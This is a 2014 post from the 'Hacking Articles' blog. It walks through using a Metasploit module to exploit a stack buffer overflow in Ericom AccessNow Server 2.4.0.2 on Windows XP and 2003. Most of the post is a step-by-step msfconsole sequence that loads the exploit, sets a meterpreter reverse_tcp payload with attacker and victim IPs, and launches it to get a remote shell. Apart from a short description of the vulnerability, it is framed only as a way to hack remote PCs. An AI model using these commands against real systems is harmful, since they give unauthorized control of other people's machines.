Hacking Articles|Raj Chandel's Blog: Hack Remote Windows PC using Ericom AccessNow Server Buffer Overflow

Hack Remote Windows PC using Ericom AccessNow Server Buffer Overflow

at 7:50 AM Thursday, June 26, 2014

This module exploits a stack based buffer overflow in Ericom AccessNow Server. The vulnerability is due to an insecure usage of vsprintf with user controlled data, which can be triggered with a malformed HTTP request. This module has been tested successfully with Ericom AccessNow Server 2.4.0.2 on Windows XP SP3 and Windows 2003 Server SP2.

Exploit Targets

Ericom AccessNow Server 2.4.0.2

Requirement

Attacker: kali Linux

Victim PC: Windows XP SP 3

Open Kali terminal type msfconsole

Now type use exploit/windows/http/ericom_access_now_bof

msf exploit (ericom_access_now_bof)>set payload windows/meterpreter/reverse_tcp

msf exploit (ericom_access_now_bof)>set lhost 192.168.1.8 (IP of Local Host)

msf exploit (ericom_access_now_bof)>set rhost 192.168.1.2 (IP of Remote PC)

msf exploit (ericom_access_now_bof)>exploit

Pages

Hacking Articles|Raj Chandel's Blog

Hack Remote Windows PC using Ericom AccessNow Server Buffer Overflow

0 comments:

Post a Comment

Labels

Popular Posts